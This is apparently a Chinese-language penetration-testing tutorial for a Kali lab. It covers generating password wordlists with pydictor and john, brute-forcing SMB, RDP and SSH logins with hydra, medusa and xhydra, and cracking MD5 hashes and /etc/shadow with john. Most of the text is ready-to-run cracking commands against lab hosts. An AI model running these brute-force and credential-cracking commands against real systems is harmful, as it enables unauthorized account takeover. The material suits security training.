赞
踩
实战-使用 pydictor 生成自己的字典工具
首先我们开始安装工具到kali上
-
- git clone https://github.com/LandGrey/pydictor.git
-
-
cd pydictor/
chmod +x pydictor.py
我们给这个python脚本文件加上可执行权限
pydictor 生成字典
pydictor.py 参数说明:
-base 表示密码所使用的字符
-base Type
d
digital
[0 - 9]
# digital [ˈdɪdʒɪtl] 数字的
L
lowercase letters [a - z] # lowercase ['ləʊəˌkeɪs] 小写字母;letters [ˈletəz] 信,字母
c
capital letters
[A - Z] # capital [ˈkæpɪtl] 大写的
-o 指定字典存储的位置
例 1:生成全部由数字组成且长度为 4 到 6 的字典
python pydictor.py -base d --len 4 6
查看生成的字典:
vim /root/pydictor/results/base_032846.txt
例 2:生成支持使用数字、小写字母与大写字母 3 者组合的 2 到 3 位数的爆破字典,把生成的字典存
在/opt/passwd.txt
例 3:生成支持使用数字、小写字母与大写字母 3 者组合的 6 位字典
python pydictor.py -base dLc --len 6 6 -o /opt/666.txt
例 4:生成含有特殊字符的自定义字符集字典
python pydictor.py -char '@#$%^&*abcdefg12345678' --len 3 5
例 5:生成以 Pa5sw0rd 开头,后面 4 位全为数字的字典
python pydictor.py -base d --len 4 4 --head Pa5sw0rd -o
/opt/pass4.txt
将一个目录下多个字典合并去掉重复的记录
实战-使用 hydra 工具在线破解系统用户密码
使用 hydra 破解 Windows 7 文件共享密码
在 Windows 系统当中,默认会启动一些文件共享,比如 C$ 或 ADMIN$(管理共享),而这些共享
是使用 smb 协议,因此我可以针对 smb 协议进行破解。
注:开启文件共享
设置 administrator 用户登录密码。
Windows 7 中开启文件共享之后在 Kali 中扫描 445 端口确保目标主机开启 455 端口
通过 john 工具生成简单的密码字典(一般的弱口令都会包含进去)
john --wordlist --rules --stdout > password.txt
破解 smb 文件共享密码
hydra 命令参数:
-l
#指定单个用户名称
-L
#指定用户名称字典
-p
#指定单个密码
-P
#指定密码字典
-s
#指定端口
-vV
#显示详细的执行过程
然后我们开始对win7进行密码攻击
hydra -l Administrator -P password.txt smb://192.168.36.135 -vV
通过密码进行远程访问目标主机共享资源
在物理机或其他 windows 主机中打开运行窗口,开始菜单中点击运行,或者使用快捷键 Win+R
\\192.168.36.135\c$
输入账号密码后即可进入
使用 hydra 破解 windows 7 远程桌面密码
Windows 远程桌面使用的 rdp 协议,默认端口是 3389,系统中默认是没有开启远程桌面服务的,
我们需要手动开启。
开始->运行-> 输入: sysdm.cpl 打开高级系统设置
同样通过 nmap 扫描 3389 端口确保服务开启。
暴力破解远程桌面密码
通过远程桌面进行连接
开始运行输入 mstsc后开始远程链接
输入刚刚破解出来的账号密码进行利用即可远程登录win7
远程连接成功。
注:如果目标系统用户正在使用操作系统,那么远程连接之后目标用户会被锁定。
使用 hydra 工具破解 ssh 服务 root 用户密码
hydra -l root -P password.txt -t 4 ssh://192.168.36.141 -e nsr -vV
-t 通过-t 参数来指定线程数默认是 16 会造成服务器拒绝连接。切记不能太快。
-e nsr 参数:
该-e 表示提供了更多测试选项。nsr 后面的字母对应更多的测试方式。
n 是尝试空密码登录
s 是将用户名作为密码登录
r 是将用户名反过来作为密码登录。 如:用户名是 root,那么会使用 toor 尝试破解。
实战使用 Medusa 工具在线破解
medusa 命令选项:常用参数标红
-h [TEXT]
#目标 IP
-H [FILE]
#目标主机文件
-u [TEXT]
#用户名
-U [FILE]
#用户名文件
-p [TEXT]
#密码
-P [FILE]
#密码文件
-C [FILE]
#组合条目文件
-O [FILE]
#文件日志信息
-e [n/s/ns]
#n 意为空密码,s 意为密码与用户名相同
-M [TEXT]
#模块执行名称
-m [TEXT]
#传递参数到模块
-d
#显示所有的模块名称
-n [NUM]
#使用非默认端口
-s
#启用 SSL
-r [NUM]
#重试间隔时间,默认为 3 秒
-t [NUM]
#设定线程数量
-L
#并行化,每个用户使用一个线程
-f
#在任何主机上找到第一个账号/密码后,停止破解
-q
#显示模块的使用信息
-v [NUM]
#详细级别(
0-6)
-w [NUM]
#错误调试级别(
0-10)
-V
#显示版本
-Z [TEXT]
#继续扫描上一次
-F
#破解到一个正确的密码即退出
Medusa 工具破解 windows 文件共享密码
medusa -M smbnt -h 192.168.36.135 -e ns -F -u Administrator -P password.txt
Medusa 工具破解 linux root 用户登录密码
medusa -M ssh -h 192.168.36.141 -e ns -F -u root -P password.txt
实战: host.txt 文件中是目标主机名称或者 IP 地址,user.txt 文件中指定需要暴力破解的用户名,
字典使用“m.txt”。使用 8000 进程,同时暴力破解。
参数: -t [NUM]
设定子进程数量
-O ssh.log 可以将成功破解的记录记录到文件中
medusa -M ssh -h 192.168.36.141 -u root -P ./password.txt -t 8 -O ./ssh.log
图形化暴力破解软件 xhydra
暴力破解软件的要素: IP, 用户名 ,端口号, 字典 , 调一下暴力破解的进程数加快速度。
本质上和 hydra 是没有区别的
xhydra
配置目标 IP 端口以及协议类型
配置用户名和密码文件
配置线程以及代理,这里不使用代理。
开始暴力破解
离线破解 md5 值和 shadow 加密文件
破解 md5 值
手动加密 md5 值,破解其他加密方式也是同理。
echo "123456" | md5sum
常见的离线破解方式
如果我们破解不出来怎么办呢?
接下来我会给大家提供一个py脚本
语法格式 python 脚本名称 (md5 值)(字典文件)
python /root/md5.py f447b20a7fcbf53a5d5be013ea0b15af /root/pydictor/password.txt
解密成功!密码是: 123456
原理很简单,脚本把我们输入的 md5 值跟字典中的所有密码的 md5 值进行对比,结果一致则正确。
破解 Linux shadow 密码
关于 shadow 文件介绍
密码由三部分组成的:$id$salt$encrypted
id 为 1 时,采用 md5 进行加密;
id 为 5 时,采用 SHA256 进行加密;
id 为 6 时,采用 SHA512 进行加密。
使用 john 破解 shadow 密码文件
john /etc/shadow
如果默认的密码字典不能够满足需求,使用下面方式指定字典进行破解。
john /etc/shadow --wordlist=/root/pydictor/password.txt
如果出现
No password hashes left to crack (see FAQ)
#无需破解密码散列(请参阅常见问题解答)
注:这是告诉我们已经有破解成功了。不需要再破解了。
查看破解的结果:
cat /root/.john/john.pot
我这里就不一一截图了,大同小异的东西
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。